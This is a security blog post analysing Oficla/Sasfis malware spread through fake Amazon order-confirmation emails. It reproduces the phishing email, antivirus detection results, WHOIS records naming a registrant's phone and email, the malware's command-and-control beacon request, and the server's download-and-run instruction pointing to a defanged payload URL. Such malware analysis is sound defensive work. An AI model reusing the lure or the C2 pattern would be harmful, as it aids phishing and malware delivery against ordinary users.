Oficla/Sasfis malware is pretty common these days in amazon shopping spam emails. The idea is quite old and simple: you will receive an e-mail with an attachment. The attachment is a zip file and once you extract and run the executable file you become infected. Below we’ll show you some of the details of this attack:
You will receive a similar mail with this one:
From: “Amazon Manager Jarvis Schwartz” <support.order@amazon.com>
X-Mailer: The Bat! (v3.71.01) Educational
Reply-To: <cut>@peoplesuccess.com
X-Priority: 3 (Normal)
Message-ID: <random_number1.random_number2@peoplesuccess.com>
To: <cut>
Subject: Your order has been paid! Parcel NR.<random number>.
MIME-Version: 1.0
Hi!
Thank you for shopping at Amazon.com
We have successfully received your payment.
Your order has been shipped to your billing address.
You have ordered ” Samsung GO N310 ”
You can find your tracking number in attached to the e-mail document.
Print the postal label to get your package.
We hope you enjoy your order!
Amazon.com
The attached document is actually a malicious file as you can see below:
| Antivirus | Version | Last Update | Result | |
| a-squared | 4.5.0.50 | 2010.04.10 | Win32.Outbreak!IK | |
| AhnLab-V3 | 5.0.0.2 | 2010.04.10 | Dropper/Agent.57344.CY | |
| AntiVir | 7.10.6.55 | 2010.04.09 | - | |
| Antiy-AVL | 2.0.3.7 | 2010.04.09 | - | |
| Authentium | 5.2.0.5 | 2010.04.10 | W32/FraudLoad.C!Generic | |
| Avast | 4.8.1351.0 | 2010.04.10 | Win32:Trojan-gen | |
| Avast5 | 5.0.332.0 | 2010.04.10 | Win32:Trojan-gen | |
| AVG | 9.0.0.787 | 2010.04.10 | Crypt.SMM | |
| BitDefender | 7.2 | 2010.04.10 | Trojan.Dropper.Agent.UXI | |
| CAT-QuickHeal | 10.00 | 2010.04.10 | - | |
| ClamAV | 0.96.0.3-git | 2010.04.10 | - | |
| Comodo | 4560 | 2010.04.10 | Heur.Suspicious | |
| DrWeb | 5.0.2.03300 | 2010.04.11 | Trojan.Oficla.37 | |
| eSafe | 7.0.17.0 | 2010.04.08 | - | |
| eTrust-Vet | 35.2.7418 | 2010.04.09 | - | |
| F-Prot | 4.5.1.85 | 2010.04.10 | W32/FraudLoad.C!Generic | |
| F-Secure | 9.0.15370.0 | 2010.04.10 | Trojan-Downloader:W32/Bredolab.XQ | |
| Fortinet | 4.0.14.0 | 2010.04.10 | - | |
| GData | 19 | 2010.04.10 | Trojan.Dropper.Agent.UXI | |
| Ikarus | T3.1.1.80.0 | 2010.04.10 | Win32.Outbreak | |
| Jiangmin | 13.0.900 | 2010.04.10 | - | |
| Kaspersky | 7.0.0.125 | 2010.04.11 | Trojan.Win32.Sasfis.albj | |
| McAfee-GW-Edition | 6.8.5 | 2010.04.09 | - | |
| Microsoft | 1.5605 | 2010.04.10 | Trojan:Win32/Oficla.M | |
| NOD32 | 5016 | 2010.04.10 | Win32/Oficla.FO | |
| Norman | 6.04.11 | 2010.04.10 | - | |
| nProtect | 2009.1.8.0 | 2010.04.06 | - | |
| Panda | 10.0.2.2 | 2010.04.10 | - | |
| PCTools | 7.0.3.5 | 2010.04.11 | Backdoor.Bredolab | |
| Prevx | 3.0 | 2010.04.11 | Medium Risk Malware | |
| Rising | 22.42.04.03 | 2010.04.09 | - | |
| Sophos | 4.52.0 | 2010.04.10 | Troj/Bredo-BW | |
| Sunbelt | 6162 | 2010.04.11 | Trojan.Win32.Generic!BT | |
| Symantec | 20091.2.0.41 | 2010.04.11 | Trojan.Sasfis | |
| TheHacker | 6.5.2.0.259 | 2010.04.11 | Trojan/Sasfis.albj | |
| TrendMicro | 9.120.0.1004 | 2010.04.10 | PAK_Generic.001 | |
| VBA32 | 3.12.12.4 | 2010.04.09 | - | |
| ViRobot | 2010.4.10.2270 | 2010.04.10 | Trojan.Win32.Sasfis.57344.C | |
| VirusBuster | 5.0.27.0 | 2010.04.10 | - | |
| Additional information | ||||
| File size: 57344 bytes | ||||
| MD5 : 4b32b4248e0910c5783733e67da73454 | ||||
| SHA1 : 5d7d2cb90b47a0365209bb3834b38626e5dc4e54 | ||||
(via VirusTotal)
This is an UPX packed file and once it executes it drops a dll with the name “lgou.rlo” in the %system32% folder (the name might depend on the malware variant) that is also detected as Oficla / Sasfis.
The domain has the following registration information:
domain: POSTFOLKOVS.RU
nserver: ns1.postfolkovs.ru. 195.78.108.200
nserver: ns2.postfolkovs.ru. 195.78.108.201
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
phone: +79766512311
e-mail: vadim.rinatovich@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2010.03.29
The request details are:
GET /markus/bb.php?v=<number>&id=<number>&b=<digits and letters>&tm=<number> HTTP/1.1
User-Agent: Opera\9.64
Host: postfolkovs.ru
As you can see, it disguises itself as Opera browser. The response from the server is in the following form:
[info]runurl:hxxp://knowingthetruth.org/templates/rhuk_solarflare_ii/<malwarefile>.exe|taskid:45|delay:45|upd:0|backurls:[/info]
Then it tries to download and execute a malicious file hosted by knowingthetruth.org domain. For now, several versions of rogue antivirus products have been observed to be downloaded from that location.
The domain details for knowingthetruth.org are as follows:
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:KNOWINGTHETRUTH.ORG@domainsbyproxy.com
Unfortunately we hit a dead end here, because the owner’s details are hidden by using the private registration service offered by domainsbyproxy.com .
No Comments Yet - be the First!